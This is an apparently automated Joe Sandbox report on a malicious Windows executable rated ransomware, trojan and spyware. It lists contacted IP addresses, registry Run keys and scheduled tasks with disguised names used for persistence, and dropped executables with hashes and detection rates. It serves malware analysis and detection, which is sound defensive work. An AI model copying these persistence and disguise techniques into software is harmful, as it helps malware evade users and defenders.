20.42.73.29	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
45.144.225.57	unknown	Netherlands	35913	DEDIPATH-LLCUS	false
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false
2.56.59.42	unknown	Netherlands	395800	GBTCLOUDUS	false
34.117.59.81	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
103.235.105.121	unknown	India	17439	NETMAGIC-APNetmagicDatacenterMumbaiIN	false
74.114.154.18	unknown	Canada	2635	AUTOMATTICUS	false
188.165.5.107	unknown	France	16276	OVHFR	false
162.159.133.233	unknown	United States	13335	CLOUDFLARENETUS	false
20.189.173.22	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
194.38.23.114	unknown	Ukraine	40963	PRAID-ASRU	false
35.205.61.67	unknown	United States	15169	GOOGLEUS	false
148.251.234.93	unknown	Germany	24940	HETZNER-ASDE	false
185.215.113.208	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553373
Start date:	14.01.2022
Start time:	19:28:36
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 18m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	7
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@72/24@0/30
EGA Information:	Successful, ratio: 71.4%
HDC Information:	Successful, ratio: 37.7% (good quality ratio 28.5%) Quality average: 67.7% Quality standard deviation: 41.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:29:50	API Interceptor	82x Sleep call for process: svchost.exe modified
19:30:01	API Interceptor	1x Sleep call for process: arnatic_6.exe modified
19:30:02	API Interceptor	2x Sleep call for process: WerFault.exe modified
19:31:05	Autostart	Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce system recover "C:\Program Files (x86)\java\Holyfybeshae.exe"
19:31:28	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RegHost C:\Users\user\AppData\Roaming\Microsoft\RegHost.exe
19:31:31	Task Scheduler	Run new task: Telemetry Logging path: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
19:31:40	Task Scheduler	Run new task: AdvancedUpdater path: C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe s>/silentall -nofreqcheck -nogui
19:31:40	Task Scheduler	Run new task: AdvancedWindowsManager #1 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 110 -t 8080
19:31:43	Task Scheduler	Run new task: AdvancedWindowsManager #2 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 111 -t 8080
19:31:49	Task Scheduler	Run new task: AdvancedWindowsManager #3 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 112 -t 8080
19:31:56	Task Scheduler	Run new task: AdvancedWindowsManager #4 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 113 -t 8080
19:31:58	Task Scheduler	Run new task: AdvancedWindowsManager #5 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 114 -t 8080
19:31:59	Task Scheduler	Run new task: AdvancedWindowsManager #6 path: C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe s>-v 115 -t 8080
19:32:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msuupd C:\Users\user\AppData\Roaming\msuupd.exe
19:32:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msuupd C:\Users\user\AppData\Roaming\msuupd.exe
19:32:49	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
19:33:37	Task Scheduler	Run new task: Firefox Default Browser Agent 6ECBB60FBA9AB6D9 path: C:\Users\user\AppData\Roaming\jegdctt

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\1234_1401[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:RucQyfp3amzb8oRg/gnEzJyybdrS5JUoLXb+T:RucQytLnvg/gEzFxrS5JLQ
MD5:	0028D805C1F08B508639D640606FA76A
SHA1:	8CBF679A096986A379E3F26CC543BD52590D3514
SHA-256:	08BDF729CAEBE8EF33B5FDF0C39DB4FC8F15ED97B69E0C0F241A54C26810FF22
SHA-512:	1D30D7F41FDB514F5C4581E866D04D5AC8F71C2676EE89F3C8A2BADB8F0AA92B4A105F6734DE9F368C1E7CD908DC26AAFE20056EC026068E84E17ACD10D96129
Malicious:	false
Reputation:	unknown
Preview:	...].....uq.1.>...-......@..?~MFB.kt..mS......Ky...k.P..^.[Z..........L....................................................................................................................................................................................................Y\.........}...................]......................................................................................}.........................................................................................................................................................................................].............B..................................]......................}....................................................................................................................................................................................................................................................................................................................#5..........(.q.X...#K2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\1234_1401[2].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:RucQyfp3amzb8oRg/gnEzJyybdrS5JUoLXb+T:RucQytLnvg/gEzFxrS5JLQ
MD5:	0028D805C1F08B508639D640606FA76A
SHA1:	8CBF679A096986A379E3F26CC543BD52590D3514
SHA-256:	08BDF729CAEBE8EF33B5FDF0C39DB4FC8F15ED97B69E0C0F241A54C26810FF22
SHA-512:	1D30D7F41FDB514F5C4581E866D04D5AC8F71C2676EE89F3C8A2BADB8F0AA92B4A105F6734DE9F368C1E7CD908DC26AAFE20056EC026068E84E17ACD10D96129
Malicious:	false
Reputation:	unknown
Preview:	...].....uq.1.>...-......@..?~MFB.kt..mS......Ky...k.P..^.[Z..........L....................................................................................................................................................................................................Y\.........}...................]......................................................................................}.........................................................................................................................................................................................].............B..................................]......................}....................................................................................................................................................................................................................................................................................................................#5..........(.q.X...#K2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\LeGXxX6[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:fNIi1zBkFfpjq3Y4pIP2+nOX+34ZvqIZebM:fNIi1VkFfpjnnOZqM
MD5:	B3E391535619BA87B6FAA1BC245F1724
SHA1:	B1C05727CDE9C1A83D18457D62D2EBBF65BB3C3D
SHA-256:	65F8AD57031866ACCEE8E775A39FED5271EA31B4AC497AD350B8215E03161BD5
SHA-512:	5F8C83CC598E7064093A5F9BBADD8D713BDE70007F5745C4FE82808D9F76184768FFE9F2DDAC40C9F81BC1ED35070990473FC609D24B8F02A44E48AD30C47466
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%................................................'..).P.%..P....................................................k..........}...................#.............................................................................................C...............................................................................................................Y......................................C.................................................................................=..............A....f..........A..................................................................\.............c..........c.....................c..........................c...................c....7....N...........c....6................Wc....7.....................................c....6................c....1................c....6....j.............c....6.................S...........6......M..........)....(...................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Roll[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:GrbLONBrbBrbCrbPlD6uxZBN3f/eri5lFBOcqyta/:GrfOrrdrurzR6uxZeriLmjyK
MD5:	113E473C4E083B156B202CB4F77F6C98
SHA1:	CAC119891DF6EE84AAC83FD1F75C856FB89D813B
SHA-256:	66E9645B2411B2D0207EE5F17D43CA5E8987DA684751A804C221A738D3E983CB
SHA-512:	10F7A2670DEA6EF80737C9FB2B8C6C7DE214B333950C684C24098CF4CBF072D8DE7F2CD72F05E02FECBA2DE0EA49993A22E6A2618D559CA1D53A647AD113E6AD
Malicious:	false
Reputation:	unknown
Preview:	...].....uq.1.>...-......@..?~MFB.kt..mS......Ky...k.P..^.[Z..........L....................................................................................................................................................................................................1..........}........q........................................................X.........................................q......q.....................................................................................................................................................................................]........q.....q.....................................................}....................................................................................................................................................................................................................................................................................................................sZ...............U.4.N

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\f[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:M1UJhFefM7JlXBTPGymqI3rfgusNKKSZrFE6dHo:vFUM7NGy2DmNvCH
MD5:	7A14B5FC36A23C9FF0BAF718FAB093CB
SHA1:	DC1244688756E1E10A73C1FCBD2FCA1C3AF3565F
SHA-256:	7A1481A3EC2646610CC068CE5BBCC169D75B7B664F3DF1997823A374B1CF19A7
SHA-512:	BFE06EDB9F1928C8F7923D7FD6D3766DFF272D06F61FC4C40F1A531589D161DE435631C8B53D5D02A64AE4BEE695FB47DF6467A5B117C188813BB0CE8BE56543
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 23%, Browse Antivirus: ReversingLabs, Detection: 82%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B../.qo\|.qo\|.qo\|c.l}.qo\|c.j}.qo\|c.k}.qo\|T.j}"qo\|T.k}.qo\|T.l}.qo\|c.n}.qo\|.qn\|.qo\|.qo\|.qo\|..m}.qo\|Rich.qo\|........PE..L.....a.................r........................@..........................0............@.................................$................................ ......................................0...@............................................text...7p.......r.................. ..`.rdata..6`.......b...v..............@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\help1201[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:5FC2E1AQ2Cj5XVwC1/eUGu2k543yn/jbngcYvI3T0pjC060Dbfe1kG:502E1Tzj5XmA/e1uDy+jrgcqOcfeOG
MD5:	421AC3D4E41572BCC8FD94C7D35A2011
SHA1:	41466FDE501D99965F70A279A40CC98FB73BE1D5
SHA-256:	DEB1B5F3163C30D36A3D4895E0A644F5FD4D7F560923D6370C2F286C0A8F1665
SHA-512:	E3A0B39774515F9E39D0DE38375B7B3DC55810A31CFB08572BEF526F5BD19282EEEDA9A1D721A90A1D161C62591E18BDED5BBC3CED2058A86DD46A8D2C3B40E1
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%..........................................E.....'..).P.%..P..............................................VO.7!..7!..7!..e...7!..e...7!...Z..7!..7 .h7!..e...7!..e...7!..e...7!......7!...............W..........}................=............................................w......................................i............................]................................................................................................................................!...........................]..................................]........w...........................]...................................].............................................]...................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\new_v11[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:SKwBtbUcuCYbLLWDNQqfIeB07ioYZp0ScY3okGC9a7FgpSlKxxB5lLFiiTI3SMTA:SBGJDWDKqfIG2ioYv0FC9BLpjU3bwzDb
MD5:	8D472A02F6F4FE76CA3CDDC66E862E2C
SHA1:	DB00C682662BFA9325F9C85F715263713B1E05F5
SHA-256:	AC91EA65EB63CB8FB9FBA0A47B05C01F62D11398BE75A6595439CF83E37B11FC
SHA-512:	A4327171533421F7E2C1E2DEF6EC9B9AFA855B37BDA4B83D38E523ECA119F7DCC914661B7F6F0C9E2C653828212601AC1DF461D84E84EBB0FD4649F7900999FC
Malicious:	false
Reputation:	unknown
Preview:	...].....uq.1.>...-......@..?~MFB.kt..mS......Ky...k.P..^.[Z..........L.....................................................................................................................................................................................................s.........}....................=............................................1C..........................................u.............................................................................................................................................................................................]...............................................=......................}.....................................................................................................................................................................................................................................................................................................................o b.a...[.....%..*Z..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\real1401[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:twGx7D2m17FHrZIitoE5xROme0yu6zE/tq5c8QT2LqG9QBc80jRPe2E:7n2mNFHrZVoYRbhn4E/tGbq8QS/jov
MD5:	7461DC699A0324B9627BFEF42F8997A6
SHA1:	233E80A76C67B4F61B3F75C007E8AD6CDC1BCD35
SHA-256:	8464ADC08481C39E3A3D633DBEF353A49838DA2825159CE273DD7346284FD46C
SHA-512:	CE88E9CAA4BF878098D230CE560594B4BDD56CE6D440BD2FCA02AAFF082899E23111C74A416C5E883BB50B6B3B8C099FD68EBF2CCC0C38E62E4ED1A04A3AF800
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%..........................................E.....'..).P.%..P....................................................D...D...D.._D...D..ID2..D.%.D...D...DT..D..ND...D..^D...D..[D...D.......D...............i........}........5...-......}......]..............................=......Q........................................9......].........................i...=...................................................................................#:.......5..............................T...].......1................].....................Y................].......w....=.......[................].............-........................].............].......K..............................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\russ[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:3En3cQyfp3amz3/b+R2qtz6EGEzytnJ/AevLrap:3O3cQytLf+v5DGEzytnhAeH+
MD5:	9A318136E1125B55215EF5138044BA60
SHA1:	E797F2E3A14E1EA47817F92EDC792E0A8D440C09
SHA-256:	F8D62C83234CE668E787BBC4CD785929A94CFCFD65027B79AF2574F4D94C7371
SHA-512:	FE735DB74F56E03AC65D111CAC39E952367A74426E3FE93596BF9F7EE3B2D9CD5188905FBD982C0DCDF5E59DA37EDA1A0AA25439FE7D865DE60A15BC3F71D58A
Malicious:	false
Reputation:	unknown
Preview:	...].....uq.1.>...-......@..?~MFB.kt..mS......Ky...k.P..^.[Z..........L...................................................................................................................................................................................................-..........}..................................................................>.........................................A.........................................................................................................................................................................................]..............x....................................]..q................}...................................................................................................................................................................................................................................................................................................................R.F..].P.Y......{...t...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\softer1401[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	49152:RfucQyVj4K7efDARM9hCIzd24U1xe0om7kc8lbbTtq:RfayVjF7efDhYmd2hje0Joceftq
MD5:	2172158FCA5FF61D086C7C9758E6317A
SHA1:	1A2C933ADA88036A19A4E39C613B8120DA471147
SHA-256:	F216E94249C77DEEA8567A9D6A5C45F52A5F27135EDD22F58DC0DA5E27C44533
SHA-512:	D76212393B1A596FC18D6B1C1537E1F2DA86C0C5315FEB77639B83C727C5F3337900EC78B97DE4735C960754A5C8951DBBE3C8E2A43649E95F6D9E48B4852633
Malicious:	false
Reputation:	unknown
Preview:	...].....uq.1.>...-......@..?~MFB.kt..mS......Ky...k.P..^.[Z..........L.....................................................................................................................................................................................................A.........}....................=.......=............................................................................................................................................................................................................................................................................].................n...............................=.....g................}.....................................................................................................................................................................................................................................................................................................................X..O..K..t.}B..../...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\utube0501[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	98304:0E6U8CakDBZapwJeLm+fKTMsdkUwVOfKNVeS6t9IGW/2InyF8pcDK0CjezHfQT/1:0jbClhYJKTvkUaVeSK9PtZ8qLowQuAF/
MD5:	3415D918A3144E485AC7B55DF36C480A
SHA1:	F7EE383DC873E629690A83E197250713F2CCB8E6
SHA-256:	28EAEE74D58DEB0B1AC344C924FACDB1F9CA2C7CFB675E05D9E15CBEDC72D2E0
SHA-512:	12F958617B99D353FBC2EDE5461E869A7DB12863C89B043382B9FB125DE2D07956126DDB2AE2C38DC541B7B234DC48864639F36EA3A309D8F15650D42DA4608F
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%..........................................u.....'..).P.%..P.............................................@\|.................2;.D...................2;.I..kkD....kkp..............................j.x........}............-..............-.............................................................................yt....................................................................................-..e.................................w..........................................-...........................................y................].....................................]...............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\newt[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:dl3cKvQB7bXXCx7il1PUYM91pEhTCbKRlsIhYFfL:dlGB77XCx7iHS9/EhTCmRlrYFD
MD5:	4A07E2790DDBE0A071C9753A35789156
SHA1:	71A0F9CD6605E82310B2A9DB71EECF6032B52B93
SHA-256:	5347691898EE93E549D9AFA5BA870FF736A7EC7DF72527A177E8670B176508FC
SHA-512:	3F1C06E367B2B650201B0E864249CD9DBF9A801E4AAB922D01E7AAE60EBF28EF2B9B8C902AF3C9DE75779C749F8C865D33869E8FD7BFBE280798EBD62822CD29
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%................................................'..).P.%..P.......................................................).....)...v.).......................).........O.....O.k.........O...........................}.........}........M...................}..............................=...............................................a..9.......U*..................................................................................................................M..........................}............}......................}.........}..........9................}.........].......%...3................}.............}........................}.........=...m........................}.....................g................}....................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\stalkar_4mo[1].bmp Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	data
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	49152:jBSz4y+TUB5AO5beZlmbwtpjRpzFEPszp1Rmv6mgREVUuaLfF7HId:j+pMuFJM1p5EkzpPm6xREVUBod
MD5:	936909AFD56C9E5A07A8611F751FF9CF
SHA1:	6CF7E70FA290D73322C3597BE8F693805B7E23D7
SHA-256:	F2A9256FB949A42729FC4764BEDF6F3669D942ED022FD7B9A316998B9B35ACC6
SHA-512:	9308E460DF9DB91970B086C8F99AFE50246CF995C47AABE580514172484F5456F096AE1E26D89DBCD85BABE52B6AE5AA8CDACBC5E0FE813EFFE975104AE132DD
Malicious:	false
Reputation:	unknown
Preview:	...]............bb..%................................................'..).P.%..P......................................................D.........m..................M..........................................................................................}....q..M......q....m.%...........!.............................e..........................................................................................}....................................}....................................]..............CTW'....<g...1........1....e.e.......i..W..`.e........q....]S..I.(W.{..u..\|.3-\|....a..x...r.%.eH.!.....+u). .0...Y9.u..u...>t;....\|R?A#..Dh..l.ia..V.<.......$.Wy.k`.S.W#z,....}....E..B.:gqD.......^./h.....tn...W .....V..i.S..:.\|.T.....6JS.}gC8E{..%.rZ[h..rw"..>...6......c=...J..~tjBU7.....Djm.s.>n...6.P`C5s.0..\|. ..E..P..........8.<..;gqj<p....1^.....l>..f.A.....IBs.K.yFT^..X.:....=.8..>.B..A.....H.B.E:....F..........~..Qq....?....8.<

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr758214[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	1536:nf7EzXSAH/axBSy+zotG3xKapfZVYB4gfOKKKKkcsHgcsV1JRJn2Qx:nf7EzCAHyXe0tG3ZBZVYfb5HNsV1c4
MD5:	0C70224F09C65619BC9D6AFC456294C9
SHA1:	975AA4311B2C4FEDE2DB8BD6293F5C54224348C7
SHA-256:	AC0B18AE0851CF5CB499BDCBA6BCE5D260F114768425AEED65CF6086B27A323D
SHA-512:	B72C10B8A3ED94E6E7796A562F860B9AD8F3815A3F3B9A24B98C56BD77A5318EDDCF69E41ADAD5975206C04E220107DF65BABDABF9DB98831BA567947B793632
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 38%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e................0...................... ....@.. ..............................F.....@.....................................S.... ..H...............................................................................................H...........SH..RSn.\|J... ...L..................@....text...`............P.............. ..`.rsrc...H.... ......................@..@.reloc..............................@..B.................................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\RobCleanerInstlr943210[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:CwM8lI/9+Qa/PHsuH3EbSSSSSabsZGpu:9nQQQacuqSSSSSabsZG
MD5:	A9DED7D6470F741B9F4509863665F74C
SHA1:	FF1A2ABB33D9DD290C9349565586C6C1E445DC1E
SHA-256:	2F326116DF411C1C9AA3728E0C191FD0888FF63DB7DB08CC70DB1F1AEBE88347
SHA-512:	507D729DDC2533616A6DF372BB8C175D44DC5B68D0A455496DE34019FCF685A6EF6A36693CCB9417637CB9783CFD48EDB039274A7C51476FD39F98796B1D78D1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D................0...................... ....@.. ...............................N....@.....................................S.... ..................................................................................................H............`_...&.tJ... ...L..................@....text...`............P.............. ..`.rsrc........ ......................@..@.reloc..............................@..B.................................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\appforpr2[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:EbWxj7XagNorsFTCp64vSMLjYgrkhnuzbgwu:2Wx3a1kO6SS6c9unn
MD5:	0162C08D87055722BC49265BD5468D16
SHA1:	901D7400D1F2BC4A87EDAFD58FEBFAC4891F9FE8
SHA-256:	92F1DF4DBB0E34C38083BB9516FB5C812175B5B73C9FDA81CA8047C5C38A1ABB
SHA-512:	193A12BAF5819BC58B310BFCC5E33EEDD06C130922596A6A4F8A16BC705A28FE3D8E75C689ECFBB970F21D66FEFA7830108F661F0E95586B4D87D1DEFB85A05F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 43%, Browse Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L...l.`.....................................0....@..........................@......U........................................]..P....p..X............................1...............................P..@............0...............................text...#........................... ..`.rdata..b7...0...8..................@..@.data........p.......T..............@....rsrc...X....p......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\ferrari[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	6144:NPfr7cLGO+vNNeB/b39qxwL9AtxansJWBpB2Ol1acxTWwnWQL:Nr7cLGvIB/ExPxPcjBrl19TW9a
MD5:	5BF9D56B1B42412A2B169F3FB41B2A4D
SHA1:	E52BA18C693843BB1A72FCA134AFBDE40A0568DF
SHA-256:	02D1BCDDD657EC1F5C83A8420E6C30FC2A83980FFCC05A0C3BB9CFA70ED1FA06
SHA-512:	E87CA5E5F7CBEF70A275C1294C3E9FC27B35A370C01F17CA84E22C99381BD96E7DDC89748D6A12D069B013E93FE2C60FA810EC98C6C4EEC864E8D1B2EF0EFF1F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,..~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L...#:._.............................k............@.............................................................................P.......(....................@..........................................@...............L............................text.............................. ..`.data...............................@....nan................................@....dis................................@....fubah..............................@....rsrc...(...........................@..@.reloc..hG...@...H...T..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file3[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:t8f39B+OecSnrJYG4oPSidpXPQvzJetHu7MgUEjumXKHt:worJYGPd1PQ7JUaMjEygK
MD5:	2DBF77866712D9EBD57EC65E7C1598A8
SHA1:	25693E771D3D25112FFA7C38875DECD562AC808D
SHA-256:	2E382DCD1F433490E453D5E7E710D2BB821C2DF09F1E16B675EE060D46DA80D6
SHA-512:	609AA7242A8908AD7B59FD5F303492DDF435320106219D9E35F88B6A9976ADC72CA1E72CD17F714D349E430F8A0D330837C81AD947AC62E4DCD2C83D32A2DBA3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 24%, Browse Antivirus: ReversingLabs, Detection: 64%
Reputation:	unknown
Preview:	MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L...P.................0......F........... ... ....@.................................+.....@..................................0.......@...D...........................................................................................................data.... .............................`.shared......0......................@....rsrc....D...@...D..................@..@.CRT.............x...L..............@......................................................................................................................................................................................................................................................................................................................kg...}R..hI.>..H......,.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\file4[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	12288:CLw0gZFUJuzEpCMQaVQ3lupttUH2jQ66PYTnxRcqh+ZygmiuLscbTzAIIbasU+By:mPJOqppLUHWP6PY7xRUjAocF+Fn
MD5:	399A7496E00DAC0E986FB7E4842E6A2C
SHA1:	8C837A80329CD1894050AE8163881289A971A99E
SHA-256:	7747F0397EF330B53D0BD68DFE9ED416A935851760657B7DF0ED93A7A8A5692C
